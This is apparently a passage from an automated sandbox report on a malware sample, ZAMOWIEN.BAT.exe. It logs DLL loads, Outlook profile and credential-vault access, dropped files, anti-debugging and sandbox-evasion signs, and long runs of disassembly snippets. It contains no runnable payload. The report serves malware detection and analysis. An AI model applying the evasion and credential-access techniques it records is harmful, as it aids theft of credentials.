          Source: C:\Windows\SysWOW64\sdchange.exe | Section loaded: wldp.dll
          Source: C:\Windows\SysWOW64\sdchange.exe | Section loaded: profapi.dll
          Source: C:\Windows\SysWOW64\sdchange.exe | Section loaded: secur32.dll
          Source: C:\Windows\SysWOW64\sdchange.exe | Section loaded: mlang.dll
          Source: C:\Windows\SysWOW64\sdchange.exe | Section loaded: propsys.dll
          Source: C:\Windows\SysWOW64\sdchange.exe | Section loaded: winsqlite3.dll
          Source: C:\Windows\SysWOW64\sdchange.exe | Section loaded: vaultcli.dll
          Source: C:\Windows\SysWOW64\sdchange.exe | Section loaded: wintypes.dll
          Source: C:\Windows\SysWOW64\sdchange.exe | Section loaded: dpapi.dll
          Source: C:\Windows\SysWOW64\sdchange.exe | Section loaded: cryptbase.dll
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | File written: C:\Windows\Resources\0409\mysterist.ini
          Source: C:\Windows\SysWOW64\sdchange.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
          Source: ZAMOWIEN.BAT.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: sdchange.pdbGCTL source: ZAMOWIEN.BAT.exe, 00000002.00000003.33540855304.00000000076AA000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mshtml.pdb source: ZAMOWIEN.BAT.exe, 00000002.00000001.33319853756.0000000000649000.00000020.00000001.01000000.00000008.sdmp
          Source: Binary string: wntdll.pdbUGP source: ZAMOWIEN.BAT.exe, 00000002.00000003.33487623850.00000000374F0000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: ZAMOWIEN.BAT.exe, ZAMOWIEN.BAT.exe, 00000002.00000003.33487623850.00000000374F0000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe
          Source: Binary string: mshtml.pdbUGP source: ZAMOWIEN.BAT.exe, 00000002.00000001.33319853756.0000000000649000.00000020.00000001.01000000.00000008.sdmp
          Source: Binary string: sdchange.pdb source: ZAMOWIEN.BAT.exe, 00000002.00000003.33540855304.00000000076AA000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          Source: Yara match | File source: 00000000.00000002.33323827525.000000000825E000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Code function: 0_2_70501B63 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 0_2_70501B63
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Code function: 0_2_70502FD0 push eax; ret 0_2_70502FFE
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Code function: 2_2_376D08CD push ecx; mov dword ptr [esp], ecx 2_2_376D08D6
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Code function: 2_2_373D7403 push cs; ret 2_2_373D740C
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Code function: 2_2_373D53AA pushad ; iretd 2_2_373D53AB
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Code function: 2_2_373E5292 push eax; ret 2_2_373E5294
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Code function: 2_2_373D3E87 push eax; iretd 2_2_373D3E8D
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | Code function: 3_2_00696403 push cs; ret 3_2_0069640C
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | Code function: 3_2_00692E87 push eax; iretd 3_2_00692E8D
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | Code function: 3_2_0069EB15 push eax; iretd 3_2_0069EB1B
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | Code function: 3_2_00694FF1 push esi; iretd 3_2_00694FF3
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | Code function: 3_2_006943AA pushad ; iretd 3_2_006943AB
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | Code function: 3_2_006957A6 pushad ; retf 3_2_006957A7
          Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 4_2_043808CD push ecx; mov dword ptr [esp], ecx 4_2_043808D6
          Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 4_2_04747403 push cs; ret 4_2_0474740C
          Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 4_2_047467A6 pushad ; retf 4_2_047467A7
          Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 4_2_04755292 push eax; ret 4_2_04755294
          Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 4_2_047453AA pushad ; iretd 4_2_047453AB
          Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 4_2_04743E87 push eax; iretd 4_2_04743E8D
          Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 4_2_04745FF1 push esi; iretd 4_2_04745FF3
          Source: C:\Windows\SysWOW64\sdchange.exe | Code function: 4_2_0474FB15 push eax; iretd 4_2_0474FB1B
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | File created: C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp\System.dll
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | File created: C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp\LangDLL.dll
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\sdchange.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Code function: 2_2_37711763 rdtsc 2_2_37711763
          Source: C:\Windows\SysWOW64\sdchange.exe | Window / User API: threadDelayed 9150
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp\System.dll
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp\LangDLL.dll
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | API coverage: 0.3 %
          Source: C:\Windows\SysWOW64\sdchange.exe | API coverage: 1.2 %
          Source: C:\Windows\SysWOW64\sdchange.exe TID: 2068 | Thread sleep count: 120 > 30
          Source: C:\Windows\SysWOW64\sdchange.exe TID: 2068 | Thread sleep time: -240000s >= -30000s
          Source: C:\Windows\SysWOW64\sdchange.exe TID: 2068 | Thread sleep count: 9150 > 30
          Source: C:\Windows\SysWOW64\sdchange.exe TID: 2068 | Thread sleep time: -18300000s >= -30000s
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\sdchange.exe | Last function: Thread delayed
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Code function: 0_2_004065C7 FindFirstFileW,FindClose, 0_2_004065C7
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Code function: 0_2_00405996 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405996
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Code function: 0_2_00402868 FindFirstFileW, 0_2_00402868
          Source: ZAMOWIEN.BAT.exe, 00000002.00000003.33484954124.00000000076A2000.00000004.00000020.00020000.00000000.sdmp, ZAMOWIEN.BAT.exe, 00000002.00000002.33592495491.00000000076A2000.00000004.00000020.00020000.00000000.sdmp, ZAMOWIEN.BAT.exe, 00000002.00000003.33485246567.00000000076A2000.00000004.00000020.00020000.00000000.sdmp, ZAMOWIEN.BAT.exe, 00000002.00000003.33540907483.00000000076A2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | API call chain: ExitProcess graph end node graph_0-4980
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | API call chain: ExitProcess graph end node graph_0-4977
          Source: C:\Windows\SysWOW64\sdchange.exe | Process information queried: ProcessInformation
          Source: C:\Windows\SysWOW64\sdchange.exe | Process queried: DebugPort
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Code function: 2_2_37711763 rdtsc 2_2_37711763
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Code function: 0_2_00401E49 LdrInitializeThunk,ShowWindow,EnableWindow, 0_2_00401E49
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Code function: 0_2_70501B63 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 0_2_70501B63
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Code function: 2_2_3778F773 mov eax, dword ptr fs:[00000030h] 2_2_3778F773
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Code function: 2_2_37711763 mov eax, dword ptr fs:[00000030h] 2_2_37711763
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Code function: 2_2_37703740 mov eax, dword ptr fs:[00000030h] 2_2_37703740
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Code function: 2_2_376CF75B mov eax, dword ptr fs:[00000030h] 2_2_376CF75B
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Code function: 2_2_3770174A mov eax, dword ptr fs:[00000030h] 2_2_3770174A
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Code function: 2_2_3775174B mov eax, dword ptr fs:[00000030h] 2_2_3775174B
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Code function: 2_2_3775174B mov ecx, dword ptr fs:[00000030h] 2_2_3775174B
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Code function: 2_2_376F9723 mov eax, dword ptr fs:[00000030h] 2_2_376F9723
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe | Code function: 2_2_376CB705 mov eax, dword ptr fs:[00000030h] 2_2_376CB705
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376DD700 mov ecx, dword ptr fs:[00000030h]2_2_376DD700
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3778F717 mov eax, dword ptr fs:[00000030h]2_2_3778F717
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3779970B mov eax, dword ptr fs:[00000030h]2_2_3779970B
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3779970B mov eax, dword ptr fs:[00000030h]2_2_3779970B
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376D37E4 mov eax, dword ptr fs:[00000030h]2_2_376D37E4
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376D37E4 mov eax, dword ptr fs:[00000030h]2_2_376D37E4
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376D37E4 mov eax, dword ptr fs:[00000030h]2_2_376D37E4
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376D37E4 mov eax, dword ptr fs:[00000030h]2_2_376D37E4
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376D37E4 mov eax, dword ptr fs:[00000030h]2_2_376D37E4
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376D37E4 mov eax, dword ptr fs:[00000030h]2_2_376D37E4
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376D37E4 mov eax, dword ptr fs:[00000030h]2_2_376D37E4
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376D77F9 mov eax, dword ptr fs:[00000030h]2_2_376D77F9
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376D77F9 mov eax, dword ptr fs:[00000030h]2_2_376D77F9
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3778F7CF mov eax, dword ptr fs:[00000030h]2_2_3778F7CF
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377A17BC mov eax, dword ptr fs:[00000030h]2_2_377A17BC
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3779D7A7 mov eax, dword ptr fs:[00000030h]2_2_3779D7A7
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3779D7A7 mov eax, dword ptr fs:[00000030h]2_2_3779D7A7
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3779D7A7 mov eax, dword ptr fs:[00000030h]2_2_3779D7A7
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37701796 mov eax, dword ptr fs:[00000030h]2_2_37701796
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37701796 mov eax, dword ptr fs:[00000030h]2_2_37701796
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377AB781 mov eax, dword ptr fs:[00000030h]2_2_377AB781
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377AB781 mov eax, dword ptr fs:[00000030h]2_2_377AB781
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376E3660 mov eax, dword ptr fs:[00000030h]2_2_376E3660
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376E3660 mov eax, dword ptr fs:[00000030h]2_2_376E3660
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376E3660 mov eax, dword ptr fs:[00000030h]2_2_376E3660
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376C7662 mov eax, dword ptr fs:[00000030h]2_2_376C7662
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376C7662 mov eax, dword ptr fs:[00000030h]2_2_376C7662
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376C7662 mov eax, dword ptr fs:[00000030h]2_2_376C7662
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37765660 mov eax, dword ptr fs:[00000030h]2_2_37765660
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3775166E mov eax, dword ptr fs:[00000030h]2_2_3775166E
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3775166E mov eax, dword ptr fs:[00000030h]2_2_3775166E
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3775166E mov eax, dword ptr fs:[00000030h]2_2_3775166E
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37705654 mov eax, dword ptr fs:[00000030h]2_2_37705654
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CD64A mov eax, dword ptr fs:[00000030h]2_2_376CD64A
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CD64A mov eax, dword ptr fs:[00000030h]2_2_376CD64A
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376D3640 mov eax, dword ptr fs:[00000030h]2_2_376D3640
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376EF640 mov eax, dword ptr fs:[00000030h]2_2_376EF640
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376EF640 mov eax, dword ptr fs:[00000030h]2_2_376EF640
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376EF640 mov eax, dword ptr fs:[00000030h]2_2_376EF640
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376D965A mov eax, dword ptr fs:[00000030h]2_2_376D965A
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376D965A mov eax, dword ptr fs:[00000030h]2_2_376D965A
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376D7623 mov eax, dword ptr fs:[00000030h]2_2_376D7623
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3770F63F mov eax, dword ptr fs:[00000030h]2_2_3770F63F
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3770F63F mov eax, dword ptr fs:[00000030h]2_2_3770F63F
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376D5622 mov eax, dword ptr fs:[00000030h]2_2_376D5622
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376D5622 mov eax, dword ptr fs:[00000030h]2_2_376D5622
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3777D62C mov ecx, dword ptr fs:[00000030h]2_2_3777D62C
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3777D62C mov ecx, dword ptr fs:[00000030h]2_2_3777D62C
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3777D62C mov eax, dword ptr fs:[00000030h]2_2_3777D62C
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376FD600 mov eax, dword ptr fs:[00000030h]2_2_376FD600
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376FD600 mov eax, dword ptr fs:[00000030h]2_2_376FD600
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37759603 mov eax, dword ptr fs:[00000030h]2_2_37759603
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37763608 mov eax, dword ptr fs:[00000030h]2_2_37763608
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37763608 mov eax, dword ptr fs:[00000030h]2_2_37763608
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37763608 mov eax, dword ptr fs:[00000030h]2_2_37763608
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37763608 mov eax, dword ptr fs:[00000030h]2_2_37763608
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37763608 mov eax, dword ptr fs:[00000030h]2_2_37763608
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37763608 mov eax, dword ptr fs:[00000030h]2_2_37763608
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3778F607 mov eax, dword ptr fs:[00000030h]2_2_3778F607
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3770360F mov eax, dword ptr fs:[00000030h]2_2_3770360F
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376C96E0 mov eax, dword ptr fs:[00000030h]2_2_376C96E0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376C96E0 mov eax, dword ptr fs:[00000030h]2_2_376C96E0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376D56E0 mov eax, dword ptr fs:[00000030h]2_2_376D56E0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376D56E0 mov eax, dword ptr fs:[00000030h]2_2_376D56E0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376D56E0 mov eax, dword ptr fs:[00000030h]2_2_376D56E0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377656E0 mov eax, dword ptr fs:[00000030h]2_2_377656E0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377656E0 mov eax, dword ptr fs:[00000030h]2_2_377656E0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377736E0 mov eax, dword ptr fs:[00000030h]2_2_377736E0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377736E0 mov eax, dword ptr fs:[00000030h]2_2_377736E0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377736E0 mov eax, dword ptr fs:[00000030h]2_2_377736E0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377736E0 mov eax, dword ptr fs:[00000030h]2_2_377736E0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377736E0 mov eax, dword ptr fs:[00000030h]2_2_377736E0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376FD6D0 mov eax, dword ptr fs:[00000030h]2_2_376FD6D0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3774D69D mov eax, dword ptr fs:[00000030h]2_2_3774D69D
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3778F68C mov eax, dword ptr fs:[00000030h]2_2_3778F68C
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37759567 mov eax, dword ptr fs:[00000030h]2_2_37759567
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3778B56E mov eax, dword ptr fs:[00000030h]2_2_3778B56E
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3778B56E mov ecx, dword ptr fs:[00000030h]2_2_3778B56E
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3778B56E mov eax, dword ptr fs:[00000030h]2_2_3778B56E
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377AB55F mov eax, dword ptr fs:[00000030h]2_2_377AB55F
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377AB55F mov eax, dword ptr fs:[00000030h]2_2_377AB55F
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376C753F mov eax, dword ptr fs:[00000030h]2_2_376C753F
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376C753F mov eax, dword ptr fs:[00000030h]2_2_376C753F
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376C753F mov eax, dword ptr fs:[00000030h]2_2_376C753F
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3770F523 mov eax, dword ptr fs:[00000030h]2_2_3770F523
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37701527 mov eax, dword ptr fs:[00000030h]2_2_37701527
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376D3536 mov eax, dword ptr fs:[00000030h]2_2_376D3536
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376D3536 mov eax, dword ptr fs:[00000030h]2_2_376D3536
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3777F51B mov eax, dword ptr fs:[00000030h]2_2_3777F51B
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3777F51B mov eax, dword ptr fs:[00000030h]2_2_3777F51B
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3777F51B mov eax, dword ptr fs:[00000030h]2_2_3777F51B
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3777F51B mov eax, dword ptr fs:[00000030h]2_2_3777F51B
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3777F51B mov eax, dword ptr fs:[00000030h]2_2_3777F51B
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3777F51B mov eax, dword ptr fs:[00000030h]2_2_3777F51B
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3777F51B mov ecx, dword ptr fs:[00000030h]2_2_3777F51B
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3777F51B mov ecx, dword ptr fs:[00000030h]2_2_3777F51B
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3777F51B mov eax, dword ptr fs:[00000030h]2_2_3777F51B
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3777F51B mov eax, dword ptr fs:[00000030h]2_2_3777F51B
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3777F51B mov eax, dword ptr fs:[00000030h]2_2_3777F51B
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3777F51B mov eax, dword ptr fs:[00000030h]2_2_3777F51B
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3777F51B mov eax, dword ptr fs:[00000030h]2_2_3777F51B
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CB502 mov eax, dword ptr fs:[00000030h]2_2_376CB502
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3778550D mov eax, dword ptr fs:[00000030h]2_2_3778550D
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3778550D mov eax, dword ptr fs:[00000030h]2_2_3778550D
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3778550D mov eax, dword ptr fs:[00000030h]2_2_3778550D
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376F1514 mov eax, dword ptr fs:[00000030h]2_2_376F1514
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376F1514 mov eax, dword ptr fs:[00000030h]2_2_376F1514
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376F1514 mov eax, dword ptr fs:[00000030h]2_2_376F1514
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376F1514 mov eax, dword ptr fs:[00000030h]2_2_376F1514
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376F1514 mov eax, dword ptr fs:[00000030h]2_2_376F1514
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376F1514 mov eax, dword ptr fs:[00000030h]2_2_376F1514
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376DB5E0 mov eax, dword ptr fs:[00000030h]2_2_376DB5E0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376DB5E0 mov eax, dword ptr fs:[00000030h]2_2_376DB5E0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376DB5E0 mov eax, dword ptr fs:[00000030h]2_2_376DB5E0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376DB5E0 mov eax, dword ptr fs:[00000030h]2_2_376DB5E0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376DB5E0 mov eax, dword ptr fs:[00000030h]2_2_376DB5E0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376DB5E0 mov eax, dword ptr fs:[00000030h]2_2_376DB5E0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377555E0 mov eax, dword ptr fs:[00000030h]2_2_377555E0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377015EF mov eax, dword ptr fs:[00000030h]2_2_377015EF
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3775B5D3 mov eax, dword ptr fs:[00000030h]2_2_3775B5D3
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CF5C7 mov eax, dword ptr fs:[00000030h]2_2_376CF5C7
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CF5C7 mov eax, dword ptr fs:[00000030h]2_2_376CF5C7
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CF5C7 mov eax, dword ptr fs:[00000030h]2_2_376CF5C7
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CF5C7 mov eax, dword ptr fs:[00000030h]2_2_376CF5C7
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CF5C7 mov eax, dword ptr fs:[00000030h]2_2_376CF5C7
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CF5C7 mov eax, dword ptr fs:[00000030h]2_2_376CF5C7
